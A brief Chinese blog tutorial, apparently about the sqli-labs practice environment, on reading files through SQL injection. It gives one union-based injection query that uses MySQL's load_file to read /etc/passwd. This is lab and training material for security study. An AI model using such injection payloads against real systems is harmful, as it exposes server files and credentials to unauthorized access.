当前位置：网站首页>SQL 注入读写文件

SQL 注入读写文件

2022-06-12 06:18:00 【Cwillchris】

1、 SQL 注入读取/etc/passwd 文件

在 MySQL 中读取文件，使用 load_file("文件路径/名称")

MariaDB [security]> select * from users where id=-1 union select 1,load_file("/etc/passwd"),3\G;

访问到 Less-1 页面：

使用 union 联合查询，在可输出位置执行 load_file 函数来读取文件

版权声明
本文为[Cwillchris]所创，转载请带上原文链接，感谢
https://blog.csdn.net/weixin_59679023/article/details/125122527